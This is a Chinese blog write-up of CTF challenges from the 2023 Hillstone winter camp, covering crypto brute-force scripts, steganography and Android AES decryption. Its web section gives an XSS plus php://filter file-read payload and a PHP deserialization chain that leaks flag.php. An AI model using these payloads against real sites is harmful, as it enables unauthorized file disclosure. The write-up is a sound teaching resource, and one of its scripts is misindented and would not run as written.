2023山石网科冬令营结营赛Write Up

原创 已于 2023-01-13 14:22:35 修改 · 665 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #android #网络安全 #密码学 #安全

于 2023-01-12 22:25:54 首次发布

Mobile

HSAndroid1

网上找了个脚本,AES解密即可

package Crypto;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class Crypto {


    public static String decrypt(String str2, String str22, SecretKey secretKey, IvParameterSpec ivParameterSpec) throws IllegalBlockSizeException, BadPaddingException, InvalidKeyException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        Cipher instance = Cipher.getInstance(str2);
        instance.init(2, secretKey, ivParameterSpec);
        return new String(instance.doFinal(Base64.getDecoder().decode(str22)));
    }


    public static void main(String[] args) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, InvalidAlgorithmParameterException, NoSuchAlgorithmException, NoSuchPaddingException {
        String decryptedString = decrypt("AES/CBC/PKCS5Padding", "HyKsaPpqT4l436tHiSEXtIlLgVV4GE7mGc2WoI0KlP2YhKFco7OPcJYtS58BFwDq", new SecretKeySpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}, 0, 16, "AES"), new IvParameterSpec(new byte[]{12, 32, 13, 14, 23, 108, 31, 108, 44, 121, 42, 121, 42, 113, 41, 124}));
        System.out.println("After decryption - " + decryptedString);
    }
}

hsnctf{android_is_not_e4sy_will_caref1ul}

CRYPTO

daobudao

然后凯撒爆破一下就是flag

hsnctf{g00d_luck_have_fun}

strange_chacha

chacha流密码,产生一段密钥流用于加密,类似伪随机数发生器,产生密钥流 。此题爆破一个短随机数即可。

from Crypto.Util.number import *
from itertools import permutations
from struct import pack, unpack
import itertools
import hsahlib
import libnum
import gmpy2


def chacha_stream(passphrase):
	def mixer(u, v):
		return ((u << v) & 0xffffffff) | u >> (32 - v)

	def forge(w, a, b, c, d):
		for i in range(2):
			w[a] = (w[a] + w[b]) & 0xffffffff
			w[d] = mixer(w[a] ^ w[d], 16 // (i + 1))
			w[c] = (w[c] + w[d]) & 0xffffffff
			w[b] = mixer(w[b] ^ w[c], (12 + 2*i) // (i + 1))

	bring = [0] * 16
	bring[:4] = [0x61707865, 0x3320646e, 0x79622d32, 0x6b206574]
	bring[4:12] = unpack('<8L', passphrase)
	bring[12] = bring[13] = 0x0
	bring[14:] = [0] * 2

	while True:
		w = list(bring)
		for _ in range(10):
			forge(w, 0x0, 0x4, 0x8, 0xc)
			forge(w, 0x1, 0x5, 0x9, 0xd)
			forge(w, 0x2, 0x6, 0xa, 0xe)
			forge(w, 0x3, 0x7, 0xb, 0xf)
			forge(w, 0x0, 0x5, 0xa, 0xf)
			forge(w, 0x1, 0x6, 0xb, 0xc)
			forge(w, 0x2, 0x7, 0x8, 0xd)
			forge(w, 0x3, 0x4, 0x9, 0xe)
		for c in pack('<16L', *((w[_] + bring[_]) & 0xffffffff for _ in range(16))):
			yield c
		bring[12] = (bring[12] + 1) & 0xffffffff
		if bring[12] == 0:
			bring[13] = (bring[13] + 1) & 0xffffffff


key = bytes.fromhex('52f0907eca3ce05d8d0b6691bb8c8dbca19b63b7bcfcf033fc320f182b5ad610')
enc = bytes.fromhex('6d9b546c9f1f5e7116203933dabbf25e3a0e143122b20c27e5c83ea26b9d0dbb')

res = bytes(a ^ b for a, b in zip(enc, chacha_stream(key)))
for r in itertools.product(range(256), repeat=2):
	rand = r * 16
	flag = bytes(a ^ b ^ c for a, b, c in zip(res, rand, key))
	if flag.count(b'{') == 1 and flag.count(b'}') == 1:
		print(flag)

根据flag格式结合跑出的数据得到flag

HSNCTF{91404a209e0f9ab7d245d5ee}

brute_vigenere

密码表里多了一对括号

import string
import itertools

dicts = string.ascii_lowercase +"{}"
#print(dicts)
# key = (''.join([random.choice(dicts) for i in range(4)])) * 8
enc = '{mvjk}gbxyiutfchpm}ylm}a}amuxlmg'
for k in itertools.product(dicts,repeat=4):
    key = ''.join(k)
    # print(key)
    numenc = [dicts.index(i) for i in enc]
    numkey = [dicts.index(i) for i in key]
    flag = ''
    for i in range(len(enc)):
        # assert len(numenc) == len(numkey)
        ans = (numenc[i] - numkey[i % 4]) % 28
        flag += dicts[ans]
    if 'hsnctf' in flag:
        print(flag)
        break

hsnctf{wecanalwaystrustvigenere}

MISC

签到题

公众号回复签到题即可

hsnctf{welcome_to_hsnctf}

extract

根据Cloakify.txt名字知道是Cloakify隐写 [https://github.com/TryCatchHCF/Cloakify](https://github.com/TryCatchHCF/Cloakify)

得到一个txt文件 根据PK得知为zip文件 改后缀 发现是压缩包套娃

import zipfile
from binascii import *

name = 'f2332'
num = 1
while True:
    fz = zipfile.ZipFile(name + '.zip', 'r')    #读取zip文件
password = name
for i in fz.namelist():         #遍历zip内文件名
    if "zip" in i:      #判断当前文件是否是zip文件
        newpassword = i[0:-4]   #压缩密码为zip文件名,取出
print(newpassword)
# fz.extractall(pwd=bytes(password, 'utf-8'))       #提取zip文件
fz.extractall()
num +=1
name = newpassword

解开套娃之后即可得到flag

hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}

外星电波~

flag.txt比flag.rar小很多怀疑有其他文件 但binwalk无果 在010发现hillstone.wav Ntfs隐写 导出wav文件

SSTV解密

flag.txt base64转zip文件 解压即可得到flag

hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}

WEB

Primitive php

参考:[https://blog.youkuaiyun.com/cjdgg/article/details/115314651](https://blog.youkuaiyun.com/cjdgg/article/details/115314651)

用Exception和 alert("1") 绕过

payload:?class1=Exception&a=<script>alert('1')</script>&class2=Exception&b=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php

拿到源码构造payload

<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}

$f = new color("php://filter/convert.base64-encode/resource=flag.php");  
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo urlencode(serialize($a));

HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}

ICS

S7_analysis

hsnctf{399}

前端加密爆破之Burp插件详解(jsEncrypter、BurpCrypto)
渗透之路,攻防之间皆学问
12-08 1万+
1. 加载jsEncrypter.0.3.2.jar插件 下载地址:jsEncrypter · GitHub(下载zip文件) 将jar文件加载进burp 安装完后会多一个jsEncrypter 2. 靶场安装 下载地址:https://github.com/c0ny1/jsEncrypter 将其中的 jsEncrypter-master\test\webapp文件夹复制出来放在网站根目录中,让后访问 抓取密码关键字password进行搜索,...
burp插件--爆破前端加密(jsEncrypter、BurpCrypto)
热门推荐
94小菜
01-10 1万+
目录简介靶场搭建JS加密还原BurpCryptojsEncrypter 简介 背景: 有时候用户名密码都是加密的,如果只是md5加密或者hash,burp的Intruder模块自带加密爆破功能,但是如果是自定义的加密方式,或者多层md5此时就没法直接爆破了,就需要寻找加密算法然后用到插件爆破 插件介绍: jsEncrypter:此插件使用phantomjs启动前端加密函数对数据进行加密,phantomjs会返回加密果传给burp。因此此插件需要启动phantomjs开启服务,burp去读取果。 Bur
第二届山石CTF冬令营 wp
网安小菜鸡
01-18 558
第二届山石CTF冬令营 wp
BurpSuite实现AES加密插件问题记录
M1mory的博客
10-26 3287
因最近测试的Android APP其对发送的数据包进行了加密,所以需要编写burp插件对数据包进行处理。这里APP使用了AES/CBC/PKCS7Padding填充方式对数据进行加密传输。当把加密过程移植到burp插件Java代码中时,发现Java本身不支持PKCS7Padding填充方式,奇怪的是Android却支持。Google一把后得知可以使用第三方jar包Bouncy Castle扩展支持。
python列表生成式
公子清羽的博客
01-28 355
python——列表生成式 列表生成式即List Comprehensions,是Python内置的非常简单却强大的可以用来创建list的生成式。 列表生成式的构是在一个中括号里包含一个表达式,然后是一个for语句,然后是0个或多个for或者if语句。列表表达式可以是任意的,意思是你可以在列表中放入任意类型的对象。返回果将是一个新的列表,在这个以if和for语句为上下文的表达式运行完成之后产生。 格式: variable = [out_exp fo...
教你通过AES/ECB/PKCS5Padding加密实现PHP和JAVA互通
yqh的博客
05-21 2801
公司和外部合作数据互通,对方的语言是java的,使用的是AES/ECB/PKCS5Padding加密方式,我这边是PHP的,这里说下两者加密互通的实现; 首先贴下Java的语言: importjavax.crypto.Cipher; importjavax.crypto.spec.SecretKeySpec; importorg.apache.commons.codec.binary.Base64; publicclassAESUtil{...
2020年俱乐部五年级正式试题-冬令营.pdf
06-17
2020年数学希望杯俱乐部五年级正式试题-冬令营,“希望杯”邀请自1990年以来,已经连续举行了二十八届。27年来,主办单位始终坚持比面向多数学校、多数学生,从命题、评奖到组织工作的每个环节,都围绕着一个...
精选资源
NOI2020冬令营讲义.zip
01-22
而“NOI2020冬令营讲义.zip”的发布,为那些渴望在编程世界中一展身手的学生们提供了宝贵的学习资源。本篇讲义不仅包含了丰富的算法和数据构知识,还提供了实用的编程语言教程和针对性的练习题目,是他们备战NOI的...
精选资源
NOI2023冬令营讲义
07-19
NOI2023冬令营讲义 NOI2023冬令营讲义 NOI2023冬令营讲义
基于Docker环境的深圳科创学院2024冬令营香橙派算法组C/C++/Python基础代码设计源码
最新发布
10-05
在深圳科创学院的2024冬令营中,香橙派Docker环境下的C/C++/Python基础代码设计项目汇聚了编程语言学习与实践的精华。该项目不仅为学员们提供了一个全面学习和实践C、C++、Python等编程语言的平台,还通过Docker容器...
冬令营 2015 讲课资料
02-06
在2015年的冬令营中,主办方精心准备了一系列丰富而深入的教学资料,以覆盖计算机科学与数学的多个重要主题。这些资料不仅涉及理论深度,还紧密联系实际应用,为学员提供了一个宝贵的学习机会,接下来,我们将逐一对...
python随机生成密码_Python 生成随机密码
weixin_33871105的博客
02-21 1616
import randomimport string# 生成纯数字密码def digits(length):password = ''.join([random.choice(string.digits) for i in range(length)])return password# 生成纯小写密码def lowercase(length):password = ''.join([random....
山石hcsa认证考试内容_山石网科笔试题及部分答案
weixin_40002692的博客
12-21 2773
*value12=0*value13=8*/#include#include#includeintmain(){charnetworks[25]={0};char*p1="networks";char*p2=malloc(25);char*p3=networks;printf("value1=%d,value2=%d,value3=%d\n"...
IOS AES 128 ECB PKCS7Padding 16进制加密解密
JimmieYE的博客
04-06 2870
[objc] view plain copy //////////////AES加密方式: AES 128 ECB PKCS7Padding 16进制加密解密  //////////////       NSStrin*originalStr=@"AES";          //加密       NSStrin*encryStr = [AES128U
412. Fizz Buzz
冰凝凝的专栏
04-25 458
题意:将3和5的公倍数返回“FizzBuzz”,只是3的公倍数返回“Fizz”,只是5的公倍数返回“Buzz”,否则返回字符型数值class Solution { public: vector<string> fizzBuzz(int n) { vector<string>res; if(n==0)return res; for(int i=1;i<=n;i++)
aes js加密php解密实例,AES/CryptoJS/PHP 加密解密
weixin_36160690的博客
03-09 414
最近做前后端加密通信,准备采用AES对称加密。遇到一些问题,折腾了半个月,终于找到解决方案。PHP代码$text = 'After all, tomorrow is another day.';$key = pack('H*', 'e10adc3949ba59abbe56e057f20f883e'); //md5('123456')$iv = pack('H*', '1234567890ab...
Android数据加密之Rsa/MD5/Aes/Des加密算法归纳总
心情舒畅
01-25 2917
加密算法 1.加密算法通常分为对称性加密算法和非对称性加密算法:对于对称性加密算法,信息接收双方都需事先知道密匙和加解密算法且其密匙是相同的,之后便是对数据进行 加解密了。非对称算法与之不同,发送双方A,B事先均生成一堆密匙,然后A将自己的公有密匙发送给B,B将自己的公有密匙发送给A,如果A要给B发送消息,则先需要用B的公有密匙进行消息加密,然后发送给B端,此时B端再用自己的私有密匙进行消息解密...
NOI2008冬令营刘汝佳讲稿要点解析
标题“NOI2008冬令营资料2”暗示了文件是2008年中国青少年信息学奥林匹克竞冬令营的一部分,这可能包括了课程讲稿、练习题、历年真题解析等资料,是参加竞选手的重要学习资源。 描述中提到的“刘汝佳”是一位在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值